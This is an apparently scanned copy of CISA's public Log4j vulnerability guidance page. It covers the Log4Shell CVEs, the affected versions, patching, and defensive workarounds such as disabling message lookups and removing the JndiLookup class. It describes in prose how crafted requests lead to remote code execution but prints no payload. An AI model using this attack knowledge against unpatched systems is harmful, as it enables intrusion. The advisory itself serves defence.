www.cisa.gov Open in urlscan Pro
2a02:26f0:7100:1a9::447a  Public Scan

Form analysis
3 forms found in the DOM

GET https://search.us-cert.gov/search

<form accept-charset="UTF-8" action="https://search.us-cert.gov/search" class="hidden-xs searchbox" method="get"><input name="utf8" type="hidden" value="✓"><input id="affiliate-desktop" name="affiliate" type="hidden" value="us-cert">
  <div class="form-group"><label class="sr-only" for="query-desktop">Enter Search Terms(s):</label>
    <div class="input-group"><input autocomplete="off" class="form-control form-control-custom input-lg" id="query-desktop" name="query" placeholder="Search" type="text">
      <div class="input-group-addon input-group-addon-custom"><button class="submit input-lg"><img alt="search icon" data-entity-type="" data-entity-uuid="" src="/sites/default/files/cert/search-icon.png" title="search icon"></button></div>
    </div>
  </div>
</form>

GET https://search.us-cert.gov/search

<form accept-charset="UTF-8" action="https://search.us-cert.gov/search" class="hidden-lg hidden-md searchbox" method="get"><input name="utf8" type="hidden" value="✓"><input id="affiliate-mobile" name="affiliate" type="hidden" value="us-cert">
  <div class="form-group"><label class="sr-only" for="query-mobile">Enter Search Terms(s):</label>
    <div class="input-group"><input autocomplete="off" class="form-control form-control-custom input-lg" id="query-mobile" name="query" placeholder="Search" type="text">
      <div class="input-group-addon input-group-addon-custom"><button class="submit input-lg"><img alt="search icon" data-entity-type="" data-entity-uuid="" src="/sites/default/files/cert/search-icon.png" title="search icon"></button></div>
    </div>
  </div>
</form>

https://public.govdelivery.com/accounts/USDHSCISA/subscribers/qualify

<form action="https://public.govdelivery.com/accounts/USDHSCISA/subscribers/qualify"><label class="visually-hidden" for="email-address-field">Enter your email address</label> <input class="signup-form" id="email-address-field" name="email"
    placeholder=" Enter your email address" title="Enter your email address" type="text"><br><input class="btn btn-primary" name="submit" title="Sign up for alerts" type="submit" value="Sign Up">&nbsp;</form>

Text Content

Skip to main content

An official website of the United States government Here's how you know

Official websites use .gov
A .gov website belongs to an official government organization in the United
States.
Secure .gov websites use HTTPS A lock () or https:// means you've safely
connected to the .gov website. Share sensitive information only on official,
secure websites.
Enter Search Terms(s):

CISA.gov Services Report

--------------------------------------------------------------------------------

Toggle navigation

Enter Search Terms(s):

CISA.gov
Services
Report


CERTMAIN MENU

 * Alerts and Tips
 * Resources
 * Industrial Control Systems
 * Report

--------------------------------------------------------------------------------


TLP:WHITE
TLP:WHITE


APACHE LOG4J VULNERABILITY GUIDANCE

Immediate Actions to Protect Against Log4j Exploitation
• Discover all internet facing assets that allow data inputs and use log4j Java
library anywhere in the stack.
• Discover all assets that use the log4j library.
• Update or isolate affected assets. Assume compromise, identify common
post-exploit sources and activity, and hunt for signs of malicious activity.
• Monitor for odd traffic patterns (e.g., JDNI LDAP/RMI outbound traffic, DMZ
systems initiating outbound connections).


SUMMARY

Note: CISA will continue to update this webpage as well as our community-sourced
GitHub repository(link is external) as we have further guidance to impart and
additional vendor information to provide.

CISA and its partners, through the Joint Cyber Defense Collaborative, are
responding to active, widespread exploitation of a critical remote code
execution (RCE) vulnerability (CVE-2021-44228) in Apache’s Log4j software
library, versions 2.0-beta9 to 2.14.1, known as "Log4Shell" and "Logjam." Log4j
is very broadly used in a variety of consumer and enterprise services, websites,
and applications—as well as in operational technology products—to log security
and performance information. An unauthenticated remote actor could exploit this
vulnerability to take control of an affected system.

 * On December 10, 2021, Apache released Log4j version 2.15.0 in a security
   update to address the CVE-2021-44228 vulnerability.
 * (Updated December 15, 2021) On December 13, 2021, Apache released Log4j
   version 2.16.0 in a security update to address the CVE-2021-45046
   vulnerability. A remote attacker can exploit this second Log4j vulnerability
   to cause a denial-of-service (DOS) condition in certain non-default
   configurations.
   * Note: affected organizations that have already upgraded to Log4j 2.15.0
     will need to upgrade to Log4j 2.16.0 to be protected against both
     CVE-2021-44228 and CVE-2021-45046.

In order for these vulnerabilities to be remediated in products and services
that use affected versions of Log4j, the maintainers of those products and
services must implement these security updates. Users of such products and
services should refer to the vendors of these products/services for security
updates. Given the severity of the vulnerabilities and the likelihood of an
increase in exploitation by sophisticated cyber threat actors, CISA urges
vendors and users to take the following actions. 

 * Vendors
   * (Updated December 15, 2021) Immediately identify, mitigate, and update
     affected products using Log4j to version 2.16.0. Note: as stated above,
     affected organizations will need to upgrade to Log4j 2.16.0 to be protected
     against both CVE-2021-44228 and CVE-2021-45046.
   * Inform your end users of products that contain these vulnerabilities and
     strongly urge them to prioritize software updates.
 * Affected Organizations
   * In addition to the immediate actions detailed in the box above, review
     CISA's GitHub repository(link is external) for a list of affected vendor
     information and apply software updates as soon as they are available. See
     Actions for Organizations Running Products with Log4j below for additional
     guidance. Note: CISA has added CVE-2021-44228 to the Known Exploited
     Vulnerabilities Catalog, which was created according to Binding Operational
     Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited
     Vulnerabilities. In accordance with BOD 22-01, federal civilian executive
     branch agencies must mitigate CVE-2021-44228 by December 24, 2021. 


TECHNICAL DETAILS

The CVE-2021-44228 RCE vulnerability—affecting Apache’s Log4j library, versions
2.0-beta9 to 2.14.1—exists in the action the Java Naming and Directory Interface
(JNDI) takes to resolve variables. According to the CVE-2021-44228 listing,
affected versions of Log4j contain JNDI features—such as message lookup
substitution—that "do not protect against adversary-controlled LDAP [Lightweight
Directory Access Protocol] and other JNDI related endpoints."

 * (Updated December 15, 2021) Note: the Apache Log4j version 2.16.0 security
   update that address the CVE-2021-45046 vulnerability disables JDNI.

An adversary can exploit this CVE-2021-44228 by submitting a specially crafted
request to a vulnerable system that causes that system to execute arbitrary
code. The request allows the adversary to take full control over the system. The
adversary can then steal information, launch ransomware, or conduct other
malicious activity. 


ACTIONS FOR ORGANIZATIONS RUNNING PRODUCTS WITH LOG4J

CISA recommends affected entities:

 * Review Apache’s Log4j Security Vulnerabilities page for additional
   information and, if appropriate, apply the provided workaround:
   * In releases >=2.10, this behavior can be mitigated by setting either the
     system property log4j2.formatMsgNoLookups or the environment variable
     LOG4J_FORMAT_MSG_NO_LOOKUPS to true.
   * For releases from 2.7 through 2.14.1 all PatternLayout patterns can be
     modified to specify the message converter as %m{nolookups} instead of just
     %m.
   * For releases from 2.0-beta9 to 2.7, the only mitigation is to remove the
     JndiLookup class from the classpath: zip -q -d log4j-core-*.jar
     org/apache/logging/log4j/core/lookup/JndiLookup.class.
 * Apply available patches immediately. See CISA's GitHub repository(link is
   external) for known affected products and patch information.
   * Prioritize patching, starting with mission critical systems,
     internet-facing systems, and networked servers. Then prioritize patching
     other affected information technology and operational technology assets. 
   * Until patches are applied, set log4j2.formatMsgNoLookups to true by adding
     -Dlog4j2.formatMsgNoLookups=True to the Java Virtual Machine command for
     starting your application. Note: this may impact the behavior of a system’s
     logging if it relies on Lookups for message formatting. Additionally, this
     mitigation will only work for versions 2.10 and above. 
   * As stated above, BOD 22-01 directs federal civilian agencies to mitigate
     CVE-2021-44228 by December 24, 2021, as part of the Known Exploited
     Vulnerabilities Catalog.
 * Conduct a security review to determine if there is a security concern or
   compromise. The log files for any services using affected Log4j versions will
   contain user-controlled strings. 
 * Consider reporting compromises immediately to CISA and the FBI(link sends
   email).


RESOURCES

This information is provided “as-is” for informational purposes only. CISA does
not endorse any company, product, or service referenced below.


ONGOING LIST OF IMPACTED PRODUCTS AND DEVICES

CISA is maintaining a community-sourced GitHub repository(link is external) that
provides a list of publicly available information and vendor-supplied advisories
regarding the Log4j vulnerability.


ONGOING SOURCES FOR DETECTION RULES 

CISA will update sources for detection rules as we obtain them.

For detection rules, see Florian Roth's GitHub page, log4j RCE Exploitation
Detection(link is external). Note: due to the urgency to share this information,
CISA has not yet validated this content.

For a list of hashes to help determine if a Java application is running a
vulnerable version of Log4j, see Rob Fuller's GitHub page,
CVE-2021-44228-Log4Shell-Hashes(link is external). Note: due to the urgency to
share this information, CISA has not yet validated this content. 


MITIGATION GUIDANCE FROM JCDC PARTNERS 

 * Microsoft blog: Guidance for Preventing, Detecting, and Hunting for
   CVE-2021-44228 Log4j 2 Exploitation (link is external)
 * Cisco Talos Intelligence Group - Comprehensive Threat Intelligence: Threat
   Advisory: Critical Apache Log4j vulnerability being exploited in the
   wild(link is external)
 * Palo Alto Networks blog: Apache log4j Vulnerability CVE-2021-4428: Analysis
   and Mitigations(link is external)
 * CrowdStrike blog: Log4j2 Vulnerability Analysis and Mitigation
   Recommendations(link is external)
 * IBM Security Intelligence blog: How Log4j Vulnerability Could Impact You(link
   is external)
 * Tenable blog: CVE-2021-44228: Proof-of-Concept for Critical Apache Log4j
   Remote Code Execution Vulnerability Available (Log4Shell)(link is external)
 * Broadcom's Symantec Enterprise blog: Apache Log4j Zero-Day Being Exploited in
   the Wild content(link is external)
 * Splunk's blog: Log4Shell - Detecting Log4j Vulnerability (CVE-2021-44228)
   Continued(link is external)
 * VMware Blog: Log4j Vulnerability Security Advisory: What You Need to
   Know(link is external)
 * Investigating CVE-2021-44228 Log4Shell Vulnerability: VMWare Threat
   Research(link is external)
 * Cloudflare Blog: CVE-2021-44228 - Log4j RCE 0-day mitigation(link is
   external)


ADDITIONAL RESOURCES

 * Joint Cybersecurity Advisory – Technical Approaches to Uncovering and
   Remediating Malicious Activity provides general incident response guidance.
 * NIST Special Publication 800-40 Revision 3, Guide to Enterprise Patch
   Management Technologies offers more information on the basics of enterprise
   patch management technologies.
 * CISA’s Cyber Essentials serve as a guide for leaders of small businesses as
   well as leaders of small and local government agencies to develop an
   actionable understanding of where to start implementing organizational
   cybersecurity practices.
 * CISA offers a range of no-cost cyber hygiene services—including vulnerability
   scanning and ransomware readiness assessments—to help critical infrastructure
   organizations assess, identify, and reduce their exposure to cyber threats.
 * New Zealand Computer Emergency Response Team’s Advisory: Log4j RCE 0-Day
   Actively Exploited
 * Canadian Centre for Cyber Security Alert: Active Exploitation of Apache Log4j
   Vulnerability(link is external)
 * United Kingdom National Cyber Security Centre Alert: Apache Log4j
   vulnerability (CVE-2021-44228)
 * Australian Cyber Security Centre Alert: Critical remote code execution
   vulnerability found in Apache Log4j2 library
 * Australian Cyber Security Centre Advisory: 2021-007: Apache Log4j2
   vulnerability – advice and mitigations
 * F5 Security Update: Apache Log4j2 Remote Code Execution vulnerability
   CVE-2021-44228(link is external)
 * Qualys blog: CVE-2021-44228: Apache Log4j2 Zero-Day Exploited in the Wild
   (Log4Shell)(link is external)
 * Royce Williams’s Tech Solvency blog: Log4Shell log4j vulnerability
   (CVE-2021-44228 / CVE-2021-45046) - cheat-sheet reference guide(link is
   external)


CONTACT US

(888)282-0870

Send us email(link sends email)

Download PGP/GPG keys

Submit website feedback


SUBSCRIBE TO ALERTS

Receive security alerts, tips, and other updates.

Enter your email address
 


HSIN
Report

--------------------------------------------------------------------------------

Home   Site Map   FAQ   Contact Us   Traffic Light Protocol   PCII  
Accountability   Disclaimer   Privacy Policy   FOIA   No Fear Act  
AccessibilityPlain WritingPlug-ins   Inspector General   The White House  
USA.gov
 

CISA is part of the Department of Homeland Security